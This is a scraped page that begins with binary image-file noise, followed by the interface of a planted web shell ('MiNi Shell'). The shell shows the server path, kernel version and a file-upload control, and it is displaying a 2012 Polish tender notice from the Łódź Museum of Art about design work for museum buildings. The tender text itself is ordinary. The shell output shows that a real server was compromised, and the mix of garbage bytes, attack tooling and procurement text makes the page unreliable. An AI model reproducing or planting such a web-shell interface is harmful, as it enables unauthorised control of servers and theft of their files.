JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120413/117316-N-2012.html

<p class="kh_header"><b>Łódź: Usługa wykonania dokumentacji technicznej rozbudowy i przebudowy budynków B,C oraz D,E,F - Muzeum Sztuki w Łodzi.</b><br>
<b>Numer ogłoszenia: 117316 - 2012; data zamieszczenia: 13.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Sztuki w Łodzi , ul. Więckowskiego 36, 90-734 Łódź, woj. łódzkie, tel. 042 633-97-90 w 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.msl.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa wykonania dokumentacji technicznej rozbudowy i przebudowy budynków B,C oraz D,E,F - Muzeum Sztuki w Łodzi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie zgodnie z obowiązującym prawem polskim, właściwymi dyrektywami i normami europejskimi oraz wytycznymi zamawiającego kompletnej dokumentacji projektowej robót budowlanych, dla których wymagane jest uzyskanie pozwolenia na budowę,  polegających na:
a.   rozbudowie, przebudowie  i remoncie  budynków BC  część 1 zamówienia.
b.   remoncie   budynków  DEF,  część 2 zamówienia.
znajdujących się na terenie siedziby głównej Muzeum Sztuki w Łodzi przy ul. Więckowskiego 36. 
Wykonawca może zaoferować wykonanie obydwóch części lub jednej z części.
W ramach dokumentacji projektowej robót budowlanych wymaga się opracowania: 
a.	projektu budowlanego, 
b.	projektu wykonawczego, 
c.	specyfikacji technicznej wykonania i odbioru robót, 
d.	informacji   w sprawie BIOZ, 
e.	przedmiarów w podziale na branże budowlane,
4.	Wykonawca sporządzi kosztorysy inwestorskie  w podziale na branże budowlane, określające szacunkową wartość zamówienia w sposób zgodny z przepisami ustawy Prawo zamówień publicznych, tzn. bez używania  nazw produktów i materiałów oraz ich  producentów. 
UWAGA:
W treści dokumentacji projektowej oraz w  kosztorysach inwestorskich,  zakazuje się używania nazw własnych produktów i materiałów oraz ich producentów pod rygorem odpowiedzialności za  naruszenie dyscypliny finansów publicznych. Należy określać produkty i materiały w sposób opisowy nie naruszający zasad uczciwej konkurencji, w szczególności przepisów ustawy z dnia 16 kwietnia 1993r. o zwalczaniu nieuczciwej konkurencji,  tekst jednolity Dz. U. z 2003r. Nr 153 poz.1503 ze zm.
Wykonawca uzyska na rzecz zamawiającego   wszystkie niezbędne  do  pozwolenia na budowę i  rozpoczęcia realizacji inwestycji budowlanej dokumenty,  w tym takie jak np. decyzja o warunkach zabudowy, inne uzgodnienia, pozwolenie Wojewódzkiego Konserwatora zabytków na wykonywanie robót budowlanych  zlokalizowanych w otoczeniu obiektów zabytkowych wpisanych do rejestru zabytków województwa łódzkiego oraz  pozwolenie na budowę. 
Przedmiot zamówienia  obejmuje także sprawowanie nadzoru autorskiego  w trakcie wykonywania robót budowlanych na podstawie dokumentacji projektowej sporządzonej przez wykonawcę  niniejszego zamówienia. 
Koszt jednej wizyty, maksymalnie 8 godzin, Wykonawca zobowiązany jest podać w formularzu ofertowym. 
Zakładana na potrzeby obliczenia ceny złożonej oferty ilość wizyt na budowie podczas pełnienia nadzoru autorskiego wynosi dla każdego zadania: 20 maksymalnie ośmiogodzinnych pobytów, pozostałe wizyty rozliczne będą dodatkowo zgodnie z podaną stawką.
Budynki   oznaczone  jako BC, część 1 zamówienia, znajdują się w otoczeniu  zabytkowych  obiektów wpisanych do rejestru zabytków  województwa łódzkiego. W załączeniu SIWZ - mapka lokalizacyjna, vide budynek B  widoczny z ul. Gdańskiej, budynek C niewidoczny od strony ulicy Gdańskiej. 
Budynki oznaczone jako  DEF, część 2 zamówienia,  są  częścią - oficyna  południowa -  głównego pałacu Maurycego Poznańskiego i wpisane  są  w rejestr zabytków województwa łódzkiego. W załączeniu SIWZ mapka lokalizacyjna, vide budynek narożny ul. Gdańska Więckowskiego.
Założenia do projektowania  zawarte są w treści załącznika do niniejszej SIWZ w odniesieniu do każdej z dwóch części odrębnie.
Istotne warunki  umowy w tym min.  istotne warunki  realizacji przedmiotu zamówienia  zawarte są  w niniejszej SIWZ oraz  w treści wzoru umowy,  stanowiącym załącznik do niniejszej SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przewiduje się, że przedmiotem zamówień uzupełniających mogą być opracowania techniczne  w zakresie  usługi zaprojektowania  robót budowlanych nie określonych przedmiotem zamówienia podstawowego,  wynikłych  w późniejszym czasie, tj. 3 lat w bezpośrednim związku z realizacją przedmiotu głównego zamówienia w związku z pojawieniem się nowych wcześniej nie znanych okoliczności posiadających wpływ na prawidłowe zrealizowanie dokumentacji projektowej na etapie wdrożenia wykonawstwa robót.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego przez wykonawcę oświadczenia z art. 22 ust. 1 ustawy pzp oraz dokumentów przedstawionych przez wykonawcę. 
Sprawdzenie ww. warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawców dokumentów i oświadczeń wg zasady spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że okresie ostatnich  3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonywał:
a.	w zakresie dotyczącym części 1 zamówienia: jedną  usługę  projektowania  dla robót budowlanych  o wartości  roboty  co najmniej 5.000.000,00 PLN,  pięć  milionów złotych , na obiekcie  użyteczności publicznej. 
Należy podać nazwę zleceniodawcy, opis, daty wykonania usługi projektowej oraz  wartość usługi projektowej i wartość robót, oraz załączyć dokumenty potwierdzające, że  usługi projektowe zostały wykonane należycie.
b.	w zakresie dotyczącym części 2 zamówienia: jedną  usługę  projektowania  dla robót budowlanych  o wartości roboty  co najmniej 1.000. 000,00 PLN,  jeden  milion złotych , na obiekcie  użyteczności  publicznej.  
             Należy podać nazwę zleceniodawcy, opis, daty wykonania usługi projektowej oraz  wartość usługi projektowej i wartość robót, oraz załączyć dokumenty potwierdzające, że  usługi projektowe zostały wykonane należycie.

Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego przez wykonawcę oświadczenia z art. 22 ust. 1 ustawy pzp oraz dokumentów przedstawionych przez wykonawcę. 
Sprawdzenie ww. warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawców dokumentów i oświadczeń wg zasady spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego przez wykonawcę oświadczenia z art. 22 ust. 1 ustawy pzp oraz dokumentów przedstawionych przez wykonawcę. 
Sprawdzenie ww. warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawców dokumentów i oświadczeń wg zasady spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy obydwóch części zamówienia: wykonawca przy wykonywaniu zamówienia będzie posiadał oraz będzie dysponował osobami  posiadającymi uprawnienia do projektowania w zakresie  następujących branż: architektonicznej  posiadającymi  minimum 5-letnie doświadczenie zawodowe w pracy na obiektach wpisanych do rejestru zabytków licząc od  dnia uzyskania  uprawnień,  do  wykonywania prac projektowych, sanitarnej posiadającymi  minimum 2-letnie doświadczenie zawodowe licząc od  dnia uzyskania  uprawnień,  do  wykonywania prac projektowych, elektrycznej posiadającymi  minimum 2-letnie doświadczenie zawodowe  licząc od  dnia uzyskania  uprawnień,  do  wykonywania prac projektowych  teletechnicznej posiadającymi  minimum 2-letnie doświadczenie zawodowe  licząc od  dnia uzyskania uprawnień,  do  wykonywania prac projektowych  konstrukcyjno budowlanej posiadającymi  minimum 2-letnie doświadczenie zawodowe  licząc od  dnia uzyskania  uprawnień,  do  wykonywania prac projektowych. Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego przez wykonawcę oświadczenia z art. 22 ust. 1 ustawy PZP oraz dokumentów przedstawionych przez wykonawcę. Sprawdzenie ww. warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez  wykonawców dokumentów i oświadczeń wg zasady spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony na podstawie złożonego przez wykonawcę oświadczenia z art. 22 ust. 1 ustawy PZP oraz dokumentów przedstawionych przez wykonawcę. Sprawdzenie ww. warunku udziału w postępowaniu odbywać się będzie na podstawie rzedłożonych przez Wykonawców dokumentów i oświadczeń wg zasady spełnia nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz oferty
pełnomocnictwo jeżeli dotyczy
koncepcja architektoniczna - vide rozdział 10 pkt 12 SIWZ. 
Szukaj dokumentów do pobrania : www.msl.org.pl/ informacje/przetargi - 2 kliknięcia w tytuł przetargu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - termin wykonania projektu budowlanego z uzgodnieniami - 20</li>
<li>3 - jakość funkcjonalność - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a.	zmiana terminu wykonania umowy z powodów niezawinionych przez wykonawcę, pod warunkiem, ze wykonawca pisemnie wykaże obiektywny brak swojej winy, w tym m.in.  wobec konieczności uzyskania niemożliwych do przewidzenia na etapie planowania inwestycji: danych, uzgodnień lub pozwoleń osób trzecich albo właściwych organów.  
b.	Zmiana personelu  pod warunkiem posiadania wymaganych zapisanych w SIWZ kwalifikacji.  
c.	zmiana podwykonawcy pod warunkiem odpowiedniego zgłoszenia i po akceptacji przez Zamawiającego
d.	zmiana nazw, siedzib stron umowy, numerów kont bankowych oraz innych danych identyfikacyjnych.
e.	zmiana przepisów prawa powszechnie obowiązującego w zakresie wysokości stawki podatku od towarów i usług.
f.	Konieczność prostowania oczywistych omyłek pisarskich i rachunkowych,
g.	Zmiana należnego wykonawcy wynagrodzenia, pod warunkiem że zmiany te będą korzystne dla Zamawiającego.
h.	wstrzymania realizacji prac objętych umową, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy
i. Inne zmiany, których nie można przewidzieć w chwili zawierania umowy pod warunkiem, że zmiany te będą korzystne dla Zamawiającego. 
j.	zmiana formy zabezpieczenia należytego wykonania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.msl.org.pl/informacje/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie głównej Muzeum Sztuki w Łodzi przy ul. Więckowskiego 36, 
90-734 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2012 godzina 10:00, miejsce: w siedzibie głównej Muzeum Sztuki w Łodzi przy ul. Więckowskiego 36, 
90-734 Łódź, kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rozbudowa, przebudowa  i remont  budynków BC.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.	W ramach dokumentacji projektowej robót budowlanych wymaga się opracowania: 
a.	projektu budowlanego, 
b.	projektu wykonawczego, 
c.	specyfikacji technicznej wykonania i odbioru robót, 
d.	informacji   w sprawie BIOZ, 
e.	przedmiarów w podziale na branże budowlane,
4.	Wykonawca sporządzi kosztorysy inwestorskie  w podziale na branże budowlane, określające szacunkową wartość zamówienia w sposób zgodny z przepisami ustawy Prawo zamówień publicznych, tzn. bez używania  nazw produktów i materiałów oraz ich  producentów. 
UWAGA:
W treści dokumentacji projektowej oraz w  kosztorysach inwestorskich,  zakazuje się używania nazw własnych produktów i materiałów oraz ich producentów pod rygorem odpowiedzialności za  naruszenie dyscypliny finansów publicznych. Należy określać produkty i materiały w sposób opisowy nie naruszający zasad uczciwej konkurencji, w szczególności przepisów ustawy z dnia 16 kwietnia 1993r. o zwalczaniu nieuczciwej konkurencji,  tekst jednolity Dz. U. z 2003r. Nr 153 poz.1503 ze zm.
5.	Wykonawca uzyska na rzecz zamawiającego   wszystkie niezbędne  do  pozwolenia na budowę i  rozpoczęcia realizacji inwestycji budowlanej dokumenty,  w tym takie jak np. decyzja o warunkach zabudowy, inne uzgodnienia, pozwolenie Wojewódzkiego Konserwatora zabytków na wykonywanie robót budowlanych  zlokalizowanych                  w otoczeniu obiektów zabytkowych wpisanych do rejestru zabytków województwa łódzkiego oraz  pozwolenie na budowę. 
6.	Przedmiot zamówienia  obejmuje także sprawowanie nadzoru autorskiego  w trakcie wykonywania robót budowlanych na podstawie dokumentacji projektowej sporządzonej przez wykonawcę  niniejszego zamówienia. 
Koszt jednej wizyty, maksymalnie 8 godzin, Wykonawca zobowiązany jest podać w formularzu ofertowym. 
Zakładana na potrzeby obliczenia ceny złożonej oferty ilość wizyt na budowie podczas pełnienia nadzoru autorskiego wynosi dla każdego zadania: 20 maksymalnie ośmiogodzinnych pobytów, pozostałe wizyty rozliczne będą dodatkowo zgodnie                  z podaną stawką.
7.	Budynki   oznaczone  jako BC, część 1 zamówienia, znajdują się w otoczeniu  zabytkowych  obiektów wpisanych do rejestru zabytków  województwa łódzkiego. W załączeniu SIWZ- mapka lokalizacyjna, vide budynek B  widoczny z ul. Gdańskiej, budynek C nie widoczny od strony ulicy Gdańskiej. 
8.	Budynki oznaczone jako  DEF, część 2 zamówienia,  są  częścią - oficyna  południowa -  głównego pałacu Maurycego Poznańskiego i wpisane  są  w rejestr zabytków województwa łódzkiego. W załączeniu SIWZ mapka lokalizacyjna, vide budynek narożny ul. Gdańska Więckowskiego.
9.	Założenia do projektowania  zawarte są w treści załącznika do niniejszej SIWZ w odniesieniu do każdej z dwóch części odrębnie.
10.	Istotne warunki  umowy w tym min.  istotne warunki  realizacji przedmiotu zamówienia  zawarte są  w niniejszej SIWZ oraz  w treści wzoru umowy,  stanowiącym załącznik do niniejszej SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. termin wykonania projektu budowlanego z uzgodnieniami - 20</li>
<li>3. jakość funkcjonalność  rozwiązań koncepcji architektonicznej - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> remont   budynków  DEF.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.	W ramach dokumentacji projektowej robót budowlanych wymaga się opracowania: 
a.	projektu budowlanego, 
b.	projektu wykonawczego, 
c.	specyfikacji technicznej wykonania i odbioru robót, 
d.	informacji   w sprawie BIOZ, 
e.	przedmiarów w podziale na branże budowlane,
4.	Wykonawca sporządzi kosztorysy inwestorskie  w podziale na branże budowlane, określające szacunkową wartość zamówienia w sposób zgodny z przepisami ustawy Prawo zamówień publicznych, tzn. bez używania  nazw produktów i materiałów oraz ich  producentów. 
UWAGA:
